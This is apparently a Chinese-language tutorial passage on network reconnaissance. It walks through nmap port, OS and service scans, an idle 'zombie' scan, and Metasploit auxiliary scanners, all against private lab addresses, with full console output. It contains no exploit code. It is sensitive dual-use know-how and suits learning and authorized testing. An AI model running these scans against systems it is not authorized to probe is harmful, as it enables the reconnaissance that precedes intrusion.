#nmap -sU 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:47 CSTStats: 0:17:39 elapsed; 0 hosts completed (1 up), 1 undergoing UDP ScanUDP Scan Timing: About 99.44% done; ETC: 13:05 (0:00:06 remaining)Nmap scan report for 192.168.0.106Host is up (0.00064s latency).Not shown: 992 closed udp ports (port-unreach)PORT     STATE         SERVICE137/udp  open          netbios-ns138/udp  open|filtered netbios-dgm500/udp  open|filtered isakmp1900/udp open|filtered upnp4500/udp open|filtered nat-t-ike5050/udp open|filtered mmcc5353/udp open|filtered zeroconf5355/udp open|filtered llmnrMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1080.72 seconds

扫描全部端口 -p "*"

#nmap -p "*" 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:49 CSTNmap scan report for 192.168.0.106Host is up (0.0039s latency).Not shown: 8319 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp25/tcp   open  smtp79/tcp   open  finger80/tcp   open  http105/tcp  open  csnet-ns106/tcp  open  pop3pw110/tcp  open  pop3135/tcp  open  msrpc139/tcp  open  netbios-ssn143/tcp  open  imap443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s1536/tcp open  ampr-inter1537/tcp open  sdsc-lm1538/tcp open  3ds-lm1539/tcp open  intellistor-lm1540/tcp open  rds1552/tcp open  pciarray1639/tcp open  cert-initiator2224/tcp open  efi-mg2383/tcp open  ms-olap42869/tcp open  icslap3306/tcp open  mysql5040/tcp open  unknown5555/tcp open  freeciv8000/tcp open  http-alt8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds

扫描频率最高的n个端口 –top-ports n

#nmap -top-ports 10  192.168.0.106 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 12:54 CSTNmap scan report for 192.168.0.106Host is up (0.00039s latency).PORT     STATE  SERVICE21/tcp   open   ftp22/tcp   closed ssh23/tcp   closed telnet25/tcp   open   smtp80/tcp   open   http110/tcp  open   pop3139/tcp  open   netbios-ssn443/tcp  open   https445/tcp  open   microsoft-ds3389/tcp closed ms-wbt-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

扫描指定端口 -p port

# nmap -p 8100 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:02 CSTNmap scan report for 192.168.0.106Host is up (0.00056s latency).PORT     STATE SERVICE8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

扫描操作系统

nmap扫描操作系统采用主动方式,15个探针,不能正确发现,仅做推测。

最基本的扫描 -O

# nmap -O 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 13:05 CSTStats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping ScanARP Ping Scan Timing: About 100.00% done; ETC: 13:05 (0:00:00 remaining)Nmap scan report for 192.168.0.161Host is up (0.0017s latency).Not shown: 977 closed tcp ports (reset)PORT     STATE SERVICE21/tcp   open  ftp22/tcp   open  ssh23/tcp   open  telnet25/tcp   open  smtp53/tcp   open  domain80/tcp   open  http111/tcp  open  rpcbind139/tcp  open  netbios-ssn445/tcp  open  microsoft-ds512/tcp  open  exec513/tcp  open  login514/tcp  open  shell1099/tcp open  rmiregistry1524/tcp open  ingreslock2049/tcp open  nfs2121/tcp open  ccproxy-ftp3306/tcp open  mysql5432/tcp open  postgresql5900/tcp open  vnc6000/tcp open  X116667/tcp open  irc8009/tcp open  ajp138180/tcp open  unknownMAC Address: 00:0C:29:FA:DD:2A (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.33Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.01 seconds

尽对“具有Open和Closed的端口”进行扫描 -O --osscan-limit

nmap -O --osscan-limit 192.168.0.158Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:37 CSTNmap scan report for 192.168.0.158Host is up (0.0068s latency).Not shown: 991 closed tcp ports (reset)PORT      STATE SERVICE135/tcp   open  msrpc139/tcp   open  netbios-ssn445/tcp   open  microsoft-ds49152/tcp open  unknown49153/tcp open  unknown49154/tcp open  unknown49155/tcp open  unknown49156/tcp open  unknown49157/tcp open  unknownMAC Address: 38:00:25:34:7E:7F (Intel Corporate)Device type: general purposeRunning: Microsoft Windows 7|2008|8.1OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 update 1Network Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 2.98 seconds

猜测最接近目标端口的操作系统 -O --osscan-guest

需要root权限

# nmap -O --osscan-guess 192.168.0.159Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 14:42 CSTNmap scan report for 192.168.0.159Host is up (0.0092s latency).All 1000 scanned ports on 192.168.0.159 are in ignored states.Not shown: 1000 closed tcp ports (reset)MAC Address: 38:00:25:34:7E:7F (Intel Corporate)Too many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopOS detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds

扫描目标服务

扫描技术

对端口扫描:默认用SYN进行扫描

对服务识别:发出探针报文,返回确认值,确认服务

对版本识别:发出探针报文,返回报文信息,分析出服务的版本

扫描服务 -sV

# nmap -sV 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:19 CSTNmap scan report for 192.168.0.106Host is up (0.00034s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE VERSION80/tcp   open  httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)135/tcp  open  msrpc   Microsoft Windows RPC139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn443/tcp  open  ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)445/tcp  open  microsoft-ds?902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)1433/tcp open  ms-sql-sMicrosoft SQL Server 2014 12.00.22692383/tcp open  ms-olap4?3000/tcp open  ppp?3306/tcp open  mysql   MariaDB (unauthorized)5555/tcp open  freeciv?8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)8080/tcp open  httpApache Tomcat/Coyote JSP engine 1.18100/tcp open  httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :=====NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======SF-Port3000-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(GeSF:nericLines,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20tSF:ext/plain;x20charset=utf-8rnConnection:x20closernrn400x20BadxSF:20Request")%r(GetRequest,174,"HTTP/1.0x20302x20FoundrnCache-ControSF:l:x20no-cachernContent-Type:x20text/html;x20charset=utf-8rnExpirSF:es:x20-1rnLocation:x20/loginrnPragma:x20no-cachernSet-Cookie:SF:x20redirect_to=%2F;x20Path=/;x20HttpOnly;x20SameSite=LaxrnX-ContenSF:t-Type-Options:x20nosniffrnX-Frame-Options:x20denyrnX-Xss-ProtectSF:ion:x201;x20mode=blockrnDate:x20Wed,x2015x20Junx202022x2002:20SF::09x20GMTrnContent-Length:x2029rnrnSF:/a>.nn")%r(Help,67,"HTTP/1.1x20400x20Badx20RequestrnContent-TySF:pe:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400SF:x20Badx20Request")%r(HTTPOptions,12E,"HTTP/1.0x20302x20FoundrnCacSF:he-Control:x20no-cachernExpires:x20-1rnLocation:x20/loginrnPraSF:gma:x20no-cachernSet-Cookie:x20redirect_to=%2F;x20Path=/;x20HttpOSF:nly;x20SameSite=LaxrnX-Content-Type-Options:x20nosniffrnX-Frame-OSF:ptions:x20denyrnX-Xss-Protection:x201;x20mode=blockrnDate:x20WeSF:d,x2015x20Junx202022x2002:20:14x20GMTrnContent-Length:x200rnSF:rn")%r(RTSPRequest,67,"HTTP/1.1x20400x20Badx20RequestrnContent-TSF:ype:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400SF:x20Badx20Request")%r(SSLSessionReq,67,"HTTP/1.1x20400x20Badx20ReqSF:uestrnContent-Type:x20text/plain;x20charset=utf-8rnConnection:x2SF:0closernrn400x20Badx20Request")%r(TerminalServerCookie,67,"HTTP/1SF:.1x20400x20Badx20RequestrnContent-Type:x20text/plain;x20charsetSF:=utf-8rnConnection:x20closernrn400x20Badx20Request")%r(TLSSessSF:ionReq,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20text/SF:plain;x20charset=utf-8rnConnection:x20closernrn400x20Badx20ReSF:quest")%r(Kerberos,67,"HTTP/1.1x20400x20Badx20RequestrnContent-TySF:pe:x20text/plain;x20charset=utf-8rnConnection:x20closernrn400SF:x20Badx20Request")%r(FourOhFourRequest,1A1,"HTTP/1.0x20302x20FoundSF:rnCache-Control:x20no-cachernContent-Type:x20text/html;x20charsetSF:=utf-8rnExpires:x20-1rnLocation:x20/loginrnPragma:x20no-cacheSF:rnSet-Cookie:x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txtSF:%252ebak;x20Path=/;x20HttpOnly;x20SameSite=LaxrnX-Content-Type-OptSF:ions:x20nosniffrnX-Frame-Options:x20denyrnX-Xss-Protection:x201;SF:x20mode=blockrnDate:x20Wed,x2015x20Junx202022x2002:20:40x20GMTSF:rnContent-Length:x2029rnrnSF:);===NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)=======SF-Port5555-TCP:V=7.92%I=7%D=6/15%Time=62A941D5%P=x86_64-pc-linux-gnu%r(GeSF:nericLines,138,"HTTP/1.0x20200x20OKrnCache-Control:x20no-cacherSF:nPragma:x20no-cachernExpires:x200rncharset:x20UTF8rnX-Frame-OpSF:tions:x20DENYrnX-XSS-Protection:x201;x20mode=blockrnX-Content-TySF:pe-Options:x20nosniffrnContent-Type:x20text/htmlrnrn{"STATUS"SF::x20"REDIRECT",x20"RESPONSE":x20"mlogin.html",x20"ExtendedRSF:esponse":x20[{"last_notification_change_ts"x20:x20""}]}")%r(GSF:etRequest,2D,"HTTP/1.0x20302x20FoundrnLocation:x20mlogin.htmlrSF:nrn")%r(HTTPOptions,2D,"HTTP/1.0x20302x20FoundrnLocation:x20mloSF:gin.htmlrnrn")%r(RTSPRequest,2D,"HTTP/1.0x20302x20FoundrnLocaSF:tion:x20mlogin.htmlrnrn")%r(FourOhFourRequest,6E,"HTTP/1.1x2040SF:4x20Notx20FoundrnCache-Control:x20max-age=3600,x20must-revalidateSF:rnExpires:x20Thu,x2015x20Junx202023x2002:21:07x20GMTrn")%r(SISF:POptions,138,"HTTP/1.0x20200x20OKrnCache-Control:x20no-cachernPSF:ragma:x20no-cachernExpires:x200rncharset:x20UTF8rnX-Frame-OptiSF:ons:x20DENYrnX-XSS-Protection:x201;x20mode=blockrnX-Content-TypeSF:-Options:x20nosniffrnContent-Type:x20text/htmlrnrn{"STATUS":SF:x20"REDIRECT",x20"RESPONSE":x20"mlogin.html",x20"ExtendedResSF:ponse":x20[{"last_notification_change_ts"x20:x20""}]}");MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 132.23 seconds

nmap组合扫描

# nmap -Pn -sS 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:35 CSTNmap scan report for 192.168.0.106Host is up (0.00014s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE80/tcp   open  http135/tcp  open  msrpc139/tcp  open  netbios-ssn443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap43000/tcp open  ppp3306/tcp open  mysql5555/tcp open  freeciv8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.62 seconds

# nmap -Pn -sS -A 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 12:40 CSTNmap scan report for 192.168.0.106Host is up (0.00029s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE VERSION80/tcp   open  httpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found135/tcp  open  msrpc   Microsoft Windows RPC139/tcp  open  netbios-ssn Microsoft Windows netbios-ssn443/tcp  open  ssl/httpApache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after:  2019-11-08T23:48:47| http-title: Welcome to XAMPP|_Requested resource was https://192.168.0.106/dashboard/|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28|_ssl-date: TLS randomness does not represent time| tls-alpn: |_  http/1.1445/tcp  open  microsoft-ds?902/tcp  open  ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)912/tcp  open  vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)1433/tcp open  ms-sql-sMicrosoft SQL Server 2014 12.00.2269.00; RTM+| ms-sql-ntlm-info: |   Target_Name: DESKTOP-9A8VFKB|   NetBIOS_Domain_Name: DESKTOP-9A8VFKB|   NetBIOS_Computer_Name: DESKTOP-9A8VFKB|   DNS_Domain_Name: DESKTOP-9A8VFKB|   DNS_Computer_Name: DESKTOP-9A8VFKB|_  Product_Version: 10.0.17763|_ssl-date: 2022-06-20T04:43:40+00:00; +10s from scanner time.| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2022-06-20T02:24:59|_Not valid after:  2052-06-20T02:24:592383/tcp open  ms-olap4?3000/tcp open  ppp?…

将扫描结果存为XML文件名和数据库

将扫描结果存为XML文件名

#nmap -oX nmap.xml 192.168.0.106tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-15 10:25 CSTNmap scan report for 192.168.0.106Host is up (0.00023s latency).Not shown: 985 closed tcp ports (reset)PORT STATE SERVICE80/tcp   open  http135/tcp  open  msrpc139/tcp  open  netbios-ssn443/tcp  open  https445/tcp  open  microsoft-ds902/tcp  open  iss-realsecure912/tcp  open  apex-mesh1433/tcp open  ms-sql-s2383/tcp open  ms-olap43000/tcp open  ppp3306/tcp open  mysql5555/tcp open  freeciv8009/tcp open  ajp138080/tcp open  http-proxy8100/tcp open  xprint-serverMAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds#cat nmap.xml …

将扫描结果存为metasploit数据库

1)先导入XML文件中

#nmap -Pn -sS -A -oX nmap.xml 192.168.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 13:30 CSTNmap scan report for 192.168.0.106Host is up (0.00071s latency).All 1000 scanned ports on 192.168.0.106 are in ignored states.Not shown: 1000 filtered tcp ports (no-response)MAC Address: C8:FF:28:E8:B8:AD (Liteon Technology)Too many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1   0.71 ms 192.168.0.106OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.18 seconds

2)再导入数据库中

msf6 > db_import /home/jerry/nmap.xml[*] Importing 'Nmap XML' data[*] Import: Parsing with 'Nokogiri v1.13.1'[*] Importing host 192.168.0.106[*] Successfully imported /home/jerry/nmap.xmlmsf6 > hosts -c addressHosts=====address-------192.168.0.106192.168.0.155

msf 也可以和mysql 一起工作,在bt5r1中msf 默认支持连接mysql:

msf> db_driver mysqlmsf> db_connect root:123456@127.0.0.1/msf3 #连接本机mysql 的msf3 数据库

mysql 默认密码123456,使用db_connect 连接时会自动创建msf3 库

metasploit使用数据库扫描

简介

#/etc/init.d/postgresql startStarting postgresql (via systemctl): postgresql.service.# msfconsolemsf> db_connect postgres:123456@127.0.0.1/msf(初始化为postgres:toor)[*] Connected to Postgres data service: 127.0.0.1/msf msf> db_status[*] Connected to msf. Connection type: postgresql.

TCP空闲扫描

找到空闲机器,利用空闲机扫描,好像不在本机上执行

空闲机器IPID, 使用IP帧标识机制的空闲机器

msf6 > use auxiliary/scanner/ip/ipidseqmsf6 auxiliary(scanner/ip/ipidseq) > optionsModule options (auxiliary/scanner/ip/ipidseq):Name   Current Setting  Required  Description----   ---------------  --------  -----------INTERFACEno   The name of the interfaceRHOSTS   yes   The target host(s), see https://github.com/rapid7/met asploit-framework/wiki/Using-MetasploitRPORT  80 yes   The target portSNAPLEN65535  yes   The number of bytes to captureTHREADS1 yes   The number of concurrent threads (max one per host)TIMEOUT500   yes   The reply read timeout in millisecondsmsf6 auxiliary(scanner/ip/ipidseq) > set rhost 192.168.0.0/24rhost => 192.168.0.0/24可以设置set rhost 192.168.0.0/24或set rhost 192.168.0.0-199或set rhost File://path/xxx.txtmsf6 auxiliary(scanner/ip/ipidseq) > set threads 50threads => 50windows:1-16Unix:1-128msf6 auxiliary(scanner/ip/ipidseq) > run[*] 192.168.0.1's IPID sequence class: All zeros[*] Scanned  82 of 256 hosts (32% complete)[*] Scanned  83 of 256 hosts (32% complete)[*] Scanned  98 of 256 hosts (38% complete)[*] 192.168.0.106's IPID sequence class: Incremental![*] Scanned 103 of 256 hosts (40% complete)[*] 192.168.0.161's IPID sequence class: All zeros[*] 192.168.0.158's IPID sequence class: Incremental![*] 192.168.0.152's IPID sequence class: Randomized[*] 192.168.0.151's IPID sequence class: Incremental![*] 192.168.0.159's IPID sequence class: All zeros[*] Scanned 128 of 256 hosts (50% complete)[*] Scanned 169 of 256 hosts (66% complete)[*] Scanned 183 of 256 hosts (71% complete)[*] Scanned 212 of 256 hosts (82% complete)[*] Scanned 232 of 256 hosts (90% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed msf6 auxiliary(scanner/ip/ipidseq) >

扫描到状态为Incremental!

试图通过192.168.0.151向192.168.0.161发包

msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.151 192.168.0.161[*] exec: nmap -PN -sI 192.168.0.151 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:18 CSTIdle scan using zombie 192.168.0.151 (192.168.0.151:80); Class: IncrementalEven though your Zombie (192.168.0.151; 192.168.0.151) appears to be vulnerable to IP ID sequence prediction (class: Incremental), our attempts have failed.  This generally means that either the Zombie uses a separate IP ID base for each host (like Solaris), or because you cannot spoof IP packets (perhaps your ISP has enabled egress filtering to prevent IP spoofing), or maybe the target network recognizes the packet source as bogus and drops themQUITTING!

试图通过192.168.0.106向192.168.0.161发包

msf6 auxiliary(scanner/ip/ipidseq) > nmap -PN -sI 192.168.0.106 192.168.0.161[*] exec: nmap -PN -sI 192.168.0.106 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 16:20 CSTIdle scan zombie 192.168.0.106 (192.168.0.106) port 80 cannot be used because it has not returned any of our probes -- perhaps it is down or firewalled.QUITTING!

不用自身IP地址项目表机器发送数据包,就可以获得目标主机的开放端口

在MSF终端中执行nmap

msf6 > db_connect postgres:123456@127.0.0.1/msfmsf6 > db_nmap -sS -A 192.168.0.106msf6> services u #查看扫描结果msf6 > services -uServices========host           port  proto  name             state  info----           ----  -----  ----             -----  ----192.168.0.106  21    tcp    ftp              open   FileZilla ftpd 0.9.41 beta192.168.0.106  25    tcp    smtp             open   Mercury/32 smtpd Mail server account Maiser192.168.0.106  79    tcp    finger           open   Mercury/32 fingerd192.168.0.106  80    tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP192.168.0.106  106   tcp    pop3pw           open   Mercury/32 poppass service192.168.0.106  110   tcp    pop3             open   Mercury/32 pop3d192.168.0.106  135   tcp    msrpc            open   Microsoft Windows RPC192.168.0.106  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn192.168.0.106  143   tcp    imap             open   Mercury/32 imapd 4.62192.168.0.106  443   tcp    ssl/http         open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28192.168.0.106  445   tcp    microsoft-ds     open192.168.0.106  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP192.168.0.106  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP192.168.0.106  1433  tcp    ms-sql-s         open   Microsoft SQL Server 2014 12.00.2269.00; RTM+192.168.0.106  2383  tcp    ms-olap4         open192.168.0.106  2869  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP192.168.0.106  3306  tcp    mysql            open   MariaDB unauthorized192.168.0.106  5555  tcp    freeciv          open192.168.0.106  8000  tcp    http-alt         open   WSGIServer/0.2 CPython/3.8.0192.168.0.106  8009  tcp    ajp13            open   Apache Jserv Protocol v1.3192.168.0.106  8080  tcp    http             open   Apache Tomcat/Coyote JSP engine 1.1192.168.0.106  8100  tcp    http             open   Apache httpd 2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28192.168.0.151  135   tcp    msrpc            open   Microsoft Windows RPC192.168.0.151  139   tcp    netbios-ssn      open   Microsoft Windows netbios-ssn192.168.0.151  445   tcp    microsoft-ds     open192.168.0.151  902   tcp    ssl/vmware-auth  open   VMware Authentication Daemon 1.10 Uses VNC, SOAP192.168.0.151  912   tcp    vmware-auth      open   VMware Authentication Daemon 1.0 Uses VNC, SOAP192.168.0.151  5357  tcp    http             open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP

使用Metasploit进行端口扫描

查询端口扫描器

msf6 auxiliary(scanner/ip/ipidseq) > search portscanMathing Modules================#  NameDisclosure Date  RankCheck  Description-  ----  ---------------  ---------  -----------0 auxiliary/scanner/portscan/ftpbouncenormal  No FTP Bounce Port Scanner1 auxiliary/scanner/natpmp/natpmp_portscan normal  No NAT-PMP External Port Scanner2 auxiliary/scanner/sap/sap_router_portscanner normal  No SAPRouter Port Scanner3 auxiliary/scanner/portscan/xmas  normal  No TCP "XMas" Port Scanner4 auxiliary/scanner/portscan/ack  normal  No TCP ACK Firewall Scanner5 auxiliary/scanner/portscan/tcp  normal  No TCP Port Scanner6 auxiliary/scanner/portscan/syn normal  No TCP SYN Port Scanner7 auxiliary/scanner/http/wordpress_pingback_access normal  No  Wordpress Pingback LocatorInteract with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_accessmsf6 > use auxiliary/scanner/portscan/synmsf6 auxiliary(scanner/portscan/syn) > set rhost 192.168.0.106rhost => 192.168.0.106msf6 auxiliary(scanner/portscan/syn) > set threads 100threads => 100msf6 auxiliary(scanner/portscan/syn) > run[+]  TCP OPEN 192.168.0.155:135[+]  TCP OPEN 192.168.0.155:139[+]  TCP OPEN 192.168.0.155:445…

速度很慢,135、139、445…端口打开

利用辅助模块

辅助模块

查看目录

# cd /usr/share/metasploit-framework/modules/auxiliary# ll总用量 108drwxr-xr-x 47 root root  4096  6月 24 17:25 admindrwxr-xr-x  2 root root  4096  6月 24 20:36 analyzedrwxr-xr-x  2 root root  4096  6月 24 20:36 bnatdrwxr-xr-x  8 root root  4096  6月 24 17:25 clientdrwxr-xr-x  4 root root  4096  6月 24 17:25 clouddrwxr-xr-x  2 root root  4096  6月 24 20:36 crawlerdrwxr-xr-x  2 root root  4096  6月 24 20:36 docxdrwxr-xr-x 27 root root  4096  6月 24 17:25 dos-rwxr-xr-x  1 root root  1473  6月 16 23:59 example.py-rw-r--r--  1 root root  1708  6月 16 23:59 example.rbdrwxr-xr-x  2 root root  4096  6月 24 20:36 fileformatdrwxr-xr-x 10 root root  4096  6月 24 17:25 fuzzersdrwxr-xr-x  2 root root 24576  6月 24 20:36 gatherdrwxr-xr-x  2 root root  4096  6月 24 20:36 parserdrwxr-xr-x  3 root root  4096  6月 24 17:25 pdfdrwxr-xr-x 87 root root  4096  6月 24 17:25 scannerdrwxr-xr-x  4 root root  4096  6月 24 20:36 serverdrwxr-xr-x  2 root root  4096  6月 24 20:36 snifferdrwxr-xr-x  9 root root  4096  6月 24 17:25 spoofdrwxr-xr-x  5 root root  4096  6月 24 17:25 sqlidrwxr-xr-x  2 root root  4096  6月 24 20:36 voipdrwxr-xr-x  5 root root  4096  6月 24 17:25 vsploit

查看模块

msf6 > show auxiliaryAuxiliary=========   #     Name                                                                     Disclosure Date  Rank    Check  Description   -     ----        ---------------  ----    -----  -----------0     auxiliary/admin/2wire/xslt_password_reset   2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability1     auxiliary/admin/android/google_play_store_uxss_xframe_rce     normal  No     Android Browser RCE Through Google Play Store XFO2     auxiliary/admin/appletv/appletv_display_image                normal  No     Apple TV Image Remote Control3     auxiliary/admin/appletv/appletv_display_video                normal  No     Apple TV Video Remote Control4     auxiliary/admin/atg/atg_client                             normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client5     auxiliary/admin/aws/aws_launch_instances                  normal  No     Launches Hosts in AWS6     auxiliary/admin/backupexec/dump                         normal  No     Veritas Backup exec Windows Remote File Access7     auxiliary/admin/backupexec/registry                       normal  No     Veritas Backup exec Server Registry Access8     auxiliary/admin/chromecast/chromecast_reset               normal  No     Chromecast Factory Reset DoS9     auxiliary/admin/chromecast/chromecast_youtube            normal  No     Chromecast YouTube Remote Control10    auxiliary/admin/db2/db2rcmd       2004-03-04           normal  No     IBM DB2 db2rcmd.exe Command Execution Vulnerability11    auxiliary/admin/dcerpc/cve_2020_1472_zerologon           normal  Yes    Netlogon Weak Cryptographic Authentication…

使用辅助模块

msf6> use scanner/http/webdav_scanner

案例:搜索不当的SQL Server

msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/mssql/mssql_pingmsf6 auxiliary(scanner/mssql/mssql_ping) > optionsModule options (auxiliary/scanner/mssql/mssql_ping):Name Current Setting  Required  Description   ---- ---------------  --------  -----------PASSWORD          noThe password for the specified usernameRHOSTS             yes   The target host(s), see https://github.com/   rapid7/metasploit-framework/wiki/Using-Meta sploitTDSENCRYPTION   false yes   Use TLS/SSL for TDS data "Force Encryption"THREADS  1yes   The number of concurrent threads (max one p   er host)USERNAMEsanoThe username to authenticate asUSE_WINDOWS_AUTHENT  false  yes   Use windows authentification (requires DOMA   IN option set)msf6 auxiliary(scanner/mssql/mssql_ping) > set rhost 192.168.0.106rhost => 192.168.0.106msf6 auxiliary(scanner/mssql/mssql_ping) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/mssql/mssql_ping) > run[*] 192.168.0.106:        - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

协议扫描

SSH扫描

msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_versionmsf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50threads => 50msf6 auxiliary(scanner/ssh/ssh_version) > run[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

FTP扫描

